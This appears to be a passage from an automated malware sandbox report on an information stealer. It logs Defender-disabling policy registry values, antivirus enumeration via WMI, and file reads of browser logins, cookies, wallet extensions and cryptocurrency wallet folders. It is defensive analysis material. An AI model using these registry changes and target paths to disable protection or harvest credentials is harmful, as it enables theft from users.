                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableOnAccessProtection 1
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableScanOnRealtimeEnable 1
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableIOAVProtection 1
                      Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{6B21693A-22DD-4D17-ACCA-995B0978C91B}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRawWriteNotification 1
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeRegistry value created: Exclusions_Extensions 1Jump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeRegistry value created: Exclusions_Extensions 1
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior
                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0000000C.00000002.2320846713.0000000004319000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 20.3.EEmC0rfrxeQDEUW4Qmh7BQX4.exe.4920000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.3.EEmC0rfrxeQDEUW4Qmh7BQX4.exe.4920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000014.00000003.2296250403.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 41.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.A_22rjVO67ooiUk2ueyL6tMl.exe.530000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2606812448.0000000003C8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.2465855956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.2266197457.0000000000532000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe, type: DROPPED
                      Source: Yara matchFile source: 11.2.J9jGBSSbDD3yrTx79DzmOLls.exe.aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.J9jGBSSbDD3yrTx79DzmOLls.exe.ac7ac0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.J9jGBSSbDD3yrTx79DzmOLls.exe.ac7ac0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.2290908467.0000000000AC7000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: J9jGBSSbDD3yrTx79DzmOLls.exe PID: 3652, type: MEMORYSTR
                      Source: Yara matchFile source: 0000000D.00000003.2439988856.0000000005CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2429156164.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\G1Y1cICOYjk_P6MTvNhL7sj.zip, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\i2FqtYqlXCxQLo2ZIevRzA8.zip, type: DROPPED
                      Source: Yara matchFile source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.477ac0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.4510000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.42e7719.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.3.EEmC0rfrxeQDEUW4Qmh7BQX4.exe.4920000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.4510000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.42e7719.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.2260000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.zfQlIB6J8n2u_zLV5LHnA1xW.exe.2260000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.ogoGQsWFwF_EcodN5qF7hiVC.exe.477ac0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.3.EEmC0rfrxeQDEUW4Qmh7BQX4.exe.4920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.2296250403.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2337447194.0000000004510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2317913229.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2320846713.0000000004210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ogoGQsWFwF_EcodN5qF7hiVC.exe PID: 3056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zfQlIB6J8n2u_zLV5LHnA1xW.exe PID: 3920, type: MEMORYSTR
                      Source: Yara matchFile source: 41.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.A_22rjVO67ooiUk2ueyL6tMl.exe.3ce6ff0.8.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_hnfanknocfeofbddgcijnmhnfnkdnaad_0.indexeddb.leveldb\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqliteJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
